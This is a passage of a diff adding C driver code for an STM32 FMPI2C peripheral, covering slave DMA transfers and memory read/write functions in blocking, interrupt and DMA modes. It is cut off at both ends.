HAL_FMPI2C_Slave_Transmit_DMA(FMPI2C_HandleTypeDef *hfmpi2c, uint8_t *pData, uint16_t Size) +{ + HAL_StatusTypeDef dmaxferstatus; + + if (hfmpi2c->State == HAL_FMPI2C_STATE_READY) + { + if ((pData == NULL) || (Size == 0U)) + { + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_INVALID_PARAM; + return HAL_ERROR; + } + /* Process Locked */ + __HAL_LOCK(hfmpi2c); + + hfmpi2c->State = HAL_FMPI2C_STATE_BUSY_TX; + hfmpi2c->Mode = HAL_FMPI2C_MODE_SLAVE; + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hfmpi2c->pBuffPtr = pData; + hfmpi2c->XferCount = Size; + hfmpi2c->XferSize = hfmpi2c->XferCount; + hfmpi2c->XferOptions = FMPI2C_NO_OPTION_FRAME; + hfmpi2c->XferISR = FMPI2C_Slave_ISR_DMA; + + if (hfmpi2c->hdmatx != NULL) + { + /* Set the FMPI2C DMA transfer complete callback */ + hfmpi2c->hdmatx->XferCpltCallback = FMPI2C_DMASlaveTransmitCplt; + + /* Set the DMA error callback */ + hfmpi2c->hdmatx->XferErrorCallback = FMPI2C_DMAError; + + /* Set the unused DMA callbacks to NULL */ + hfmpi2c->hdmatx->XferHalfCpltCallback = NULL; + hfmpi2c->hdmatx->XferAbortCallback = NULL; + + /* Enable the DMA stream */ + dmaxferstatus = HAL_DMA_Start_IT(hfmpi2c->hdmatx, (uint32_t)pData, (uint32_t)&hfmpi2c->Instance->TXDR, + hfmpi2c->XferSize); + } + else + { + /* Update FMPI2C state */ + hfmpi2c->State = HAL_FMPI2C_STATE_LISTEN; + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + + /* Update FMPI2C error code */ + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_DMA_PARAM; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_ERROR; + } + + if (dmaxferstatus == HAL_OK) + { + /* Enable Address Acknowledge */ + hfmpi2c->Instance->CR2 &= ~FMPI2C_CR2_NACK; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Note : The FMPI2C interrupts must be enabled after unlocking current process + to avoid the risk of FMPI2C interrupt handle execution before current + process unlock */ + /* Enable ERR, STOP, NACK, ADDR interrupts */ + FMPI2C_Enable_IRQ(hfmpi2c, FMPI2C_XFER_LISTEN_IT); + + /* Enable DMA Request */ + hfmpi2c->Instance->CR1 |= FMPI2C_CR1_TXDMAEN; + } + else + { + /* Update FMPI2C state */ + hfmpi2c->State = HAL_FMPI2C_STATE_LISTEN; + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + + /* Update FMPI2C error code */ + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_DMA; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_ERROR; + } + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Receive in slave mode an amount of data in non-blocking mode with DMA + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPI2C_Slave_Receive_DMA(FMPI2C_HandleTypeDef *hfmpi2c, uint8_t *pData, uint16_t Size) +{ + HAL_StatusTypeDef dmaxferstatus; + + if (hfmpi2c->State == HAL_FMPI2C_STATE_READY) + { + if ((pData == NULL) || (Size == 0U)) + { + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_INVALID_PARAM; + return HAL_ERROR; + } + /* Process Locked */ + __HAL_LOCK(hfmpi2c); + + hfmpi2c->State = HAL_FMPI2C_STATE_BUSY_RX; + hfmpi2c->Mode = HAL_FMPI2C_MODE_SLAVE; + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hfmpi2c->pBuffPtr = pData; + hfmpi2c->XferCount = Size; + hfmpi2c->XferSize = hfmpi2c->XferCount; + hfmpi2c->XferOptions = FMPI2C_NO_OPTION_FRAME; + hfmpi2c->XferISR = FMPI2C_Slave_ISR_DMA; + + if (hfmpi2c->hdmarx != NULL) + { + /* Set the FMPI2C DMA transfer complete callback */ + hfmpi2c->hdmarx->XferCpltCallback = FMPI2C_DMASlaveReceiveCplt; + + /* Set the DMA error callback */ + hfmpi2c->hdmarx->XferErrorCallback = FMPI2C_DMAError; + + /* Set the unused DMA callbacks to NULL */ + hfmpi2c->hdmarx->XferHalfCpltCallback = NULL; + hfmpi2c->hdmarx->XferAbortCallback = NULL; + + /* Enable the DMA stream */ + dmaxferstatus = HAL_DMA_Start_IT(hfmpi2c->hdmarx, (uint32_t)&hfmpi2c->Instance->RXDR, (uint32_t)pData, + hfmpi2c->XferSize); + } + else + { + /* Update FMPI2C state */ + hfmpi2c->State = HAL_FMPI2C_STATE_LISTEN; + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + + /* Update FMPI2C error code */ + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_DMA_PARAM; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_ERROR; + } + + if (dmaxferstatus == HAL_OK) + { + /* Enable Address Acknowledge */ + hfmpi2c->Instance->CR2 &= ~FMPI2C_CR2_NACK; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Note : The FMPI2C interrupts must be enabled after unlocking current process + to avoid the risk of FMPI2C interrupt handle execution before current + process unlock */ + /* Enable ERR, STOP, NACK, ADDR interrupts */ + FMPI2C_Enable_IRQ(hfmpi2c, FMPI2C_XFER_LISTEN_IT); + + /* Enable DMA Request */ + hfmpi2c->Instance->CR1 |= FMPI2C_CR1_RXDMAEN; + } + else + { + /* Update FMPI2C state */ + hfmpi2c->State = HAL_FMPI2C_STATE_LISTEN; + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + + /* Update FMPI2C error code */ + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_DMA; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_ERROR; + } + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} +/** + * @brief Write an amount of data in blocking mode to a specific memory address + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param MemAddress Internal memory address + * @param MemAddSize Size of internal memory address + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @param Timeout Timeout duration + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPI2C_Mem_Write(FMPI2C_HandleTypeDef *hfmpi2c, uint16_t DevAddress, uint16_t MemAddress, + uint16_t MemAddSize, uint8_t *pData, uint16_t Size, uint32_t Timeout) +{ + uint32_t tickstart; + + /* Check the parameters */ + assert_param(IS_FMPI2C_MEMADD_SIZE(MemAddSize)); + + if (hfmpi2c->State == HAL_FMPI2C_STATE_READY) + { + if ((pData == NULL) || (Size == 0U)) + { + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_INVALID_PARAM; + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hfmpi2c); + + /* Init tickstart for timeout management*/ + tickstart = HAL_GetTick(); + + if (FMPI2C_WaitOnFlagUntilTimeout(hfmpi2c, FMPI2C_FLAG_BUSY, SET, FMPI2C_TIMEOUT_BUSY, tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + hfmpi2c->State = HAL_FMPI2C_STATE_BUSY_TX; + hfmpi2c->Mode = HAL_FMPI2C_MODE_MEM; + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hfmpi2c->pBuffPtr = pData; + hfmpi2c->XferCount = Size; + hfmpi2c->XferISR = NULL; + + /* Send Slave Address and Memory Address */ + if (FMPI2C_RequestMemoryWrite(hfmpi2c, DevAddress, MemAddress, MemAddSize, Timeout, tickstart) != HAL_OK) + { + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + return HAL_ERROR; + } + + /* Set NBYTES to write and reload if hfmpi2c->XferCount > MAX_NBYTE_SIZE */ + if (hfmpi2c->XferCount > MAX_NBYTE_SIZE) + { + hfmpi2c->XferSize = MAX_NBYTE_SIZE; + FMPI2C_TransferConfig(hfmpi2c, DevAddress, (uint8_t)hfmpi2c->XferSize, FMPI2C_RELOAD_MODE, FMPI2C_NO_STARTSTOP); + } + else + { + hfmpi2c->XferSize = hfmpi2c->XferCount; + FMPI2C_TransferConfig(hfmpi2c, DevAddress, (uint8_t)hfmpi2c->XferSize, FMPI2C_AUTOEND_MODE, FMPI2C_NO_STARTSTOP); + } + + do + { + /* Wait until TXIS flag is set */ + if (FMPI2C_WaitOnTXISFlagUntilTimeout(hfmpi2c, Timeout, tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + /* Write data to TXDR */ + hfmpi2c->Instance->TXDR = *hfmpi2c->pBuffPtr; + + /* Increment Buffer pointer */ + hfmpi2c->pBuffPtr++; + + hfmpi2c->XferCount--; + hfmpi2c->XferSize--; + + if ((hfmpi2c->XferCount != 0U) && (hfmpi2c->XferSize == 0U)) + { + /* Wait until TCR flag is set */ + if (FMPI2C_WaitOnFlagUntilTimeout(hfmpi2c, FMPI2C_FLAG_TCR, RESET, Timeout, tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + if (hfmpi2c->XferCount > MAX_NBYTE_SIZE) + { + hfmpi2c->XferSize = MAX_NBYTE_SIZE; + FMPI2C_TransferConfig(hfmpi2c, DevAddress, (uint8_t)hfmpi2c->XferSize, FMPI2C_RELOAD_MODE, + FMPI2C_NO_STARTSTOP); + } + else + { + hfmpi2c->XferSize = hfmpi2c->XferCount; + FMPI2C_TransferConfig(hfmpi2c, DevAddress, (uint8_t)hfmpi2c->XferSize, FMPI2C_AUTOEND_MODE, + FMPI2C_NO_STARTSTOP); + } + } + + } while (hfmpi2c->XferCount > 0U); + + /* No need to Check TC flag, with AUTOEND mode the stop is automatically generated */ + /* Wait until STOPF flag is reset */ + if (FMPI2C_WaitOnSTOPFlagUntilTimeout(hfmpi2c, Timeout, tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + /* Clear STOP Flag */ + __HAL_FMPI2C_CLEAR_FLAG(hfmpi2c, FMPI2C_FLAG_STOPF); + + /* Clear Configuration Register 2 */ + FMPI2C_RESET_CR2(hfmpi2c); + + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Read an amount of data in blocking mode from a specific memory address + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param MemAddress Internal memory address + * @param MemAddSize Size of internal memory address + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @param Timeout Timeout duration + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPI2C_Mem_Read(FMPI2C_HandleTypeDef *hfmpi2c, uint16_t DevAddress, uint16_t MemAddress, + uint16_t MemAddSize, uint8_t *pData, uint16_t Size, uint32_t Timeout) +{ + uint32_t tickstart; + + /* Check the parameters */ + assert_param(IS_FMPI2C_MEMADD_SIZE(MemAddSize)); + + if (hfmpi2c->State == HAL_FMPI2C_STATE_READY) + { + if ((pData == NULL) || (Size == 0U)) + { + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_INVALID_PARAM; + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hfmpi2c); + + /* Init tickstart for timeout management*/ + tickstart = HAL_GetTick(); + + if (FMPI2C_WaitOnFlagUntilTimeout(hfmpi2c, FMPI2C_FLAG_BUSY, SET, FMPI2C_TIMEOUT_BUSY, tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + hfmpi2c->State = HAL_FMPI2C_STATE_BUSY_RX; + hfmpi2c->Mode = HAL_FMPI2C_MODE_MEM; + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hfmpi2c->pBuffPtr = pData; + hfmpi2c->XferCount = Size; + hfmpi2c->XferISR = NULL; + + /* Send Slave Address and Memory Address */ + if (FMPI2C_RequestMemoryRead(hfmpi2c, DevAddress, MemAddress, MemAddSize, Timeout, tickstart) != HAL_OK) + { + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + return HAL_ERROR; + } + + /* Send Slave Address */ + /* Set NBYTES to write and reload if hfmpi2c->XferCount > MAX_NBYTE_SIZE and generate RESTART */ + if (hfmpi2c->XferCount > MAX_NBYTE_SIZE) + { + hfmpi2c->XferSize = MAX_NBYTE_SIZE; + FMPI2C_TransferConfig(hfmpi2c, DevAddress, (uint8_t)hfmpi2c->XferSize, FMPI2C_RELOAD_MODE, + FMPI2C_GENERATE_START_READ); + } + else + { + hfmpi2c->XferSize = hfmpi2c->XferCount; + FMPI2C_TransferConfig(hfmpi2c, DevAddress, (uint8_t)hfmpi2c->XferSize, FMPI2C_AUTOEND_MODE, + FMPI2C_GENERATE_START_READ); + } + + do + { + /* Wait until RXNE flag is set */ + if (FMPI2C_WaitOnFlagUntilTimeout(hfmpi2c, FMPI2C_FLAG_RXNE, RESET, Timeout, tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + /* Read data from RXDR */ + *hfmpi2c->pBuffPtr = (uint8_t)hfmpi2c->Instance->RXDR; + + /* Increment Buffer pointer */ + hfmpi2c->pBuffPtr++; + + hfmpi2c->XferSize--; + hfmpi2c->XferCount--; + + if ((hfmpi2c->XferCount != 0U) && (hfmpi2c->XferSize == 0U)) + { + /* Wait until TCR flag is set */ + if (FMPI2C_WaitOnFlagUntilTimeout(hfmpi2c, FMPI2C_FLAG_TCR, RESET, Timeout, tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + if (hfmpi2c->XferCount > MAX_NBYTE_SIZE) + { + hfmpi2c->XferSize = MAX_NBYTE_SIZE; + FMPI2C_TransferConfig(hfmpi2c, DevAddress, (uint8_t) hfmpi2c->XferSize, FMPI2C_RELOAD_MODE, + FMPI2C_NO_STARTSTOP); + } + else + { + hfmpi2c->XferSize = hfmpi2c->XferCount; + FMPI2C_TransferConfig(hfmpi2c, DevAddress, (uint8_t)hfmpi2c->XferSize, FMPI2C_AUTOEND_MODE, + FMPI2C_NO_STARTSTOP); + } + } + } while (hfmpi2c->XferCount > 0U); + + /* No need to Check TC flag, with AUTOEND mode the stop is automatically generated */ + /* Wait until STOPF flag is reset */ + if (FMPI2C_WaitOnSTOPFlagUntilTimeout(hfmpi2c, Timeout, tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + /* Clear STOP Flag */ + __HAL_FMPI2C_CLEAR_FLAG(hfmpi2c, FMPI2C_FLAG_STOPF); + + /* Clear Configuration Register 2 */ + FMPI2C_RESET_CR2(hfmpi2c); + + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} +/** + * @brief Write an amount of data in non-blocking mode with Interrupt to a specific memory address + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param MemAddress Internal memory address + * @param MemAddSize Size of internal memory address + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPI2C_Mem_Write_IT(FMPI2C_HandleTypeDef *hfmpi2c, uint16_t DevAddress, uint16_t MemAddress, + uint16_t MemAddSize, uint8_t *pData, uint16_t Size) +{ + uint32_t tickstart; + uint32_t xfermode; + + /* Check the parameters */ + assert_param(IS_FMPI2C_MEMADD_SIZE(MemAddSize)); + + if (hfmpi2c->State == HAL_FMPI2C_STATE_READY) + { + if ((pData == NULL) || (Size == 0U)) + { + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_INVALID_PARAM; + return HAL_ERROR; + } + + if (__HAL_FMPI2C_GET_FLAG(hfmpi2c, FMPI2C_FLAG_BUSY) == SET) + { + return HAL_BUSY; + } + + /* Process Locked */ + __HAL_LOCK(hfmpi2c); + + /* Init tickstart for timeout management*/ + tickstart = HAL_GetTick(); + + hfmpi2c->State = HAL_FMPI2C_STATE_BUSY_TX; + hfmpi2c->Mode = HAL_FMPI2C_MODE_MEM; + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hfmpi2c->pBuffPtr = pData; + hfmpi2c->XferCount = Size; + hfmpi2c->XferOptions = FMPI2C_NO_OPTION_FRAME; + hfmpi2c->XferISR = FMPI2C_Master_ISR_IT; + + if (hfmpi2c->XferCount > MAX_NBYTE_SIZE) + { + hfmpi2c->XferSize = MAX_NBYTE_SIZE; + xfermode = FMPI2C_RELOAD_MODE; + } + else + { + hfmpi2c->XferSize = hfmpi2c->XferCount; + xfermode = FMPI2C_AUTOEND_MODE; + } + + /* Send Slave Address and Memory Address */ + if (FMPI2C_RequestMemoryWrite(hfmpi2c, DevAddress, MemAddress, MemAddSize, FMPI2C_TIMEOUT_FLAG, tickstart) + != HAL_OK) + { + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + return HAL_ERROR; + } + + /* Set NBYTES to write and reload if hfmpi2c->XferCount > MAX_NBYTE_SIZE and generate RESTART */ + FMPI2C_TransferConfig(hfmpi2c, DevAddress, (uint8_t)hfmpi2c->XferSize, xfermode, FMPI2C_NO_STARTSTOP); + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Note : The FMPI2C interrupts must be enabled after unlocking current process + to avoid the risk of FMPI2C interrupt handle execution before current + process unlock */ + + /* Enable ERR, TC, STOP, NACK, TXI interrupt */ + /* possible to enable all of these */ + /* FMPI2C_IT_ERRI | FMPI2C_IT_TCI | FMPI2C_IT_STOPI | FMPI2C_IT_NACKI | + FMPI2C_IT_ADDRI | FMPI2C_IT_RXI | FMPI2C_IT_TXI */ + FMPI2C_Enable_IRQ(hfmpi2c, FMPI2C_XFER_TX_IT); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Read an amount of data in non-blocking mode with Interrupt from a specific memory address + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param MemAddress Internal memory address + * @param MemAddSize Size of internal memory address + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPI2C_Mem_Read_IT(FMPI2C_HandleTypeDef *hfmpi2c, uint16_t DevAddress, uint16_t MemAddress, + uint16_t MemAddSize, uint8_t *pData, uint16_t Size) +{ + uint32_t tickstart; + uint32_t xfermode; + + /* Check the parameters */ + assert_param(IS_FMPI2C_MEMADD_SIZE(MemAddSize)); + + if (hfmpi2c->State == HAL_FMPI2C_STATE_READY) + { + if ((pData == NULL) || (Size == 0U)) + { + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_INVALID_PARAM; + return HAL_ERROR; + } + + if (__HAL_FMPI2C_GET_FLAG(hfmpi2c, FMPI2C_FLAG_BUSY) == SET) + { + return HAL_BUSY; + } + + /* Process Locked */ + __HAL_LOCK(hfmpi2c); + + /* Init tickstart for timeout management*/ + tickstart = HAL_GetTick(); + + hfmpi2c->State = HAL_FMPI2C_STATE_BUSY_RX; + hfmpi2c->Mode = HAL_FMPI2C_MODE_MEM; + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hfmpi2c->pBuffPtr = pData; + hfmpi2c->XferCount = Size; + hfmpi2c->XferOptions = FMPI2C_NO_OPTION_FRAME; + hfmpi2c->XferISR = FMPI2C_Master_ISR_IT; + + if (hfmpi2c->XferCount > MAX_NBYTE_SIZE) + { + hfmpi2c->XferSize = MAX_NBYTE_SIZE; + xfermode = FMPI2C_RELOAD_MODE; + } + else + { + hfmpi2c->XferSize = hfmpi2c->XferCount; + xfermode = FMPI2C_AUTOEND_MODE; + } + + /* Send Slave Address and Memory Address */ + if (FMPI2C_RequestMemoryRead(hfmpi2c, DevAddress, MemAddress, MemAddSize, FMPI2C_TIMEOUT_FLAG, tickstart) != HAL_OK) + { + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + return HAL_ERROR; + } + + /* Set NBYTES to write and reload if hfmpi2c->XferCount > MAX_NBYTE_SIZE and generate RESTART */ + FMPI2C_TransferConfig(hfmpi2c, DevAddress, (uint8_t)hfmpi2c->XferSize, xfermode, FMPI2C_GENERATE_START_READ); + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Note : The FMPI2C interrupts must be enabled after unlocking current process + to avoid the risk of FMPI2C interrupt handle execution before current + process unlock */ + + /* Enable ERR, TC, STOP, NACK, RXI interrupt */ + /* possible to enable all of these */ + /* FMPI2C_IT_ERRI | FMPI2C_IT_TCI | FMPI2C_IT_STOPI | FMPI2C_IT_NACKI | + FMPI2C_IT_ADDRI | FMPI2C_IT_RXI | FMPI2C_IT_TXI */ + FMPI2C_Enable_IRQ(hfmpi2c, FMPI2C_XFER_RX_IT); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} +/** + * @brief Write an amount of data in non-blocking mode with DMA to a specific memory address + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param MemAddress Internal memory address + * @param MemAddSize Size of internal memory address + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPI2C_Mem_Write_DMA(FMPI2C_HandleTypeDef *hfmpi2c, uint16_t DevAddress, uint16_t MemAddress, + uint16_t MemAddSize, uint8_t *pData, uint16_t Size) +{ + uint32_t tickstart; + uint32_t xfermode; + HAL_StatusTypeDef dmaxferstatus; + + /* Check the parameters */ + assert_param(IS_FMPI2C_MEMADD_SIZE(MemAddSize)); + + if (hfmpi2c->State == HAL_FMPI2C_STATE_READY) + { + if ((pData == NULL) || (Size == 0U)) + { + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_INVALID_PARAM; + return HAL_ERROR; + } + + if (__HAL_FMPI2C_GET_FLAG(hfmpi2c, FMPI2C_FLAG_BUSY) == SET) + { + return HAL_BUSY; + } + + /* Process Locked */ + __HAL_LOCK(hfmpi2c); + + /* Init tickstart for timeout management*/ + tickstart = HAL_GetTick(); + + hfmpi2c->State = HAL_FMPI2C_STATE_BUSY_TX; + hfmpi2c->Mode = HAL_FMPI2C_MODE_MEM; + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hfmpi2c->pBuffPtr = pData; + hfmpi2c->XferCount = Size; + hfmpi2c->XferOptions = FMPI2C_NO_OPTION_FRAME; + hfmpi2c->XferISR = FMPI2C_Master_ISR_DMA; + + if (hfmpi2c->XferCount > MAX_NBYTE_SIZE) + { + hfmpi2c->XferSize = MAX_NBYTE_SIZE; + xfermode = FMPI2C_RELOAD_MODE; + } + else + { + hfmpi2c->XferSize = hfmpi2c->XferCount; + xfermode = FMPI2C_AUTOEND_MODE; + } + + /* Send Slave Address and Memory Address */ + if (FMPI2C_RequestMemoryWrite(hfmpi2c, DevAddress, MemAddress, MemAddSize, FMPI2C_TIMEOUT_FLAG, tickstart) + != HAL_OK) + { + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + return HAL_ERROR; + } + + + if (hfmpi2c->hdmatx != NULL) + { + /* Set the FMPI2C DMA transfer complete callback */ + hfmpi2c->hdmatx->XferCpltCallback = FMPI2C_DMAMasterTransmitCplt; + + /* Set the DMA error callback */ + hfmpi2c->hdmatx->XferErrorCallback = FMPI2C_DMAError; + + /* Set the unused DMA callbacks to NULL */ + hfmpi2c->hdmatx->XferHalfCpltCallback = NULL; + hfmpi2c->hdmatx->XferAbortCallback = NULL; + + /* Enable the DMA stream */ + dmaxferstatus = HAL_DMA_Start_IT(hfmpi2c->hdmatx, (uint32_t)pData, (uint32_t)&hfmpi2c->Instance->TXDR, + hfmpi2c->XferSize); + } + else + { + /* Update FMPI2C state */ + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + + /* Update FMPI2C error code */ + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_DMA_PARAM; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_ERROR; + } + + if (dmaxferstatus == HAL_OK) + { + /* Send Slave Address */ + /* Set NBYTES to write and reload if hfmpi2c->XferCount > MAX_NBYTE_SIZE and generate RESTART */ + FMPI2C_TransferConfig(hfmpi2c, DevAddress, (uint8_t)hfmpi2c->XferSize, xfermode, FMPI2C_NO_STARTSTOP); + + /* Update XferCount value */ + hfmpi2c->XferCount -= hfmpi2c->XferSize; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + /* Note : The FMPI2C interrupts must be enabled after unlocking current process + to avoid the risk of FMPI2C interrupt handle execution before current + process unlock */ + /* Enable ERR and NACK interrupts */ + FMPI2C_Enable_IRQ(hfmpi2c, FMPI2C_XFER_ERROR_IT); + + /* Enable DMA Request */ + hfmpi2c->Instance->CR1 |= FMPI2C_CR1_TXDMAEN; + } + else + { + /* Update FMPI2C state */ + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + + /* Update FMPI2C error code */ + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_DMA; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_ERROR; + } + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Reads an amount of data in non-blocking mode with DMA from a specific memory address. + * @param hfmpi2c Pointer to a FMPI2C_HandleTypeDef structure that contains + * the configuration information for the specified FMPI2C. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param MemAddress Internal memory address + * @param MemAddSize Size of internal memory address + * @param pData Pointer to data buffer + * @param Size Amount of data to be read + * @retval HAL status + */ +HAL_StatusTypeDef HAL_FMPI2C_Mem_Read_DMA(FMPI2C_HandleTypeDef *hfmpi2c, uint16_t DevAddress, uint16_t MemAddress, + uint16_t MemAddSize, uint8_t *pData, uint16_t Size) +{ + uint32_t tickstart; + uint32_t xfermode; + HAL_StatusTypeDef dmaxferstatus; + + /* Check the parameters */ + assert_param(IS_FMPI2C_MEMADD_SIZE(MemAddSize)); + + if (hfmpi2c->State == HAL_FMPI2C_STATE_READY) + { + if ((pData == NULL) || (Size == 0U)) + { + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_INVALID_PARAM; + return HAL_ERROR; + } + + if (__HAL_FMPI2C_GET_FLAG(hfmpi2c, FMPI2C_FLAG_BUSY) == SET) + { + return HAL_BUSY; + } + + /* Process Locked */ + __HAL_LOCK(hfmpi2c); + + /* Init tickstart for timeout management*/ + tickstart = HAL_GetTick(); + + hfmpi2c->State = HAL_FMPI2C_STATE_BUSY_RX; + hfmpi2c->Mode = HAL_FMPI2C_MODE_MEM; + hfmpi2c->ErrorCode = HAL_FMPI2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hfmpi2c->pBuffPtr = pData; + hfmpi2c->XferCount = Size; + hfmpi2c->XferOptions = FMPI2C_NO_OPTION_FRAME; + hfmpi2c->XferISR = FMPI2C_Master_ISR_DMA; + + if (hfmpi2c->XferCount > MAX_NBYTE_SIZE) + { + hfmpi2c->XferSize = MAX_NBYTE_SIZE; + xfermode = FMPI2C_RELOAD_MODE; + } + else + { + hfmpi2c->XferSize = hfmpi2c->XferCount; + xfermode = FMPI2C_AUTOEND_MODE; + } + + /* Send Slave Address and Memory Address */ + if (FMPI2C_RequestMemoryRead(hfmpi2c, DevAddress, MemAddress, MemAddSize, FMPI2C_TIMEOUT_FLAG, tickstart) != HAL_OK) + { + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + return HAL_ERROR; + } + + if (hfmpi2c->hdmarx != NULL) + { + /* Set the FMPI2C DMA transfer complete callback */ + hfmpi2c->hdmarx->XferCpltCallback = FMPI2C_DMAMasterReceiveCplt; + + /* Set the DMA error callback */ + hfmpi2c->hdmarx->XferErrorCallback = FMPI2C_DMAError; + + /* Set the unused DMA callbacks to NULL */ + hfmpi2c->hdmarx->XferHalfCpltCallback = NULL; + hfmpi2c->hdmarx->XferAbortCallback = NULL; + + /* Enable the DMA stream */ + dmaxferstatus = HAL_DMA_Start_IT(hfmpi2c->hdmarx, (uint32_t)&hfmpi2c->Instance->RXDR, (uint32_t)pData, + hfmpi2c->XferSize); + } + else + { + /* Update FMPI2C state */ + hfmpi2c->State = HAL_FMPI2C_STATE_READY; + hfmpi2c->Mode = HAL_FMPI2C_MODE_NONE; + + /* Update FMPI2C error code */ + hfmpi2c->ErrorCode |= HAL_FMPI2C_ERROR_DMA_PARAM; + + /* Process Unlocked */ + __HAL_UNLOCK(hfmpi2c); + + return HAL_ERROR; + } + + if 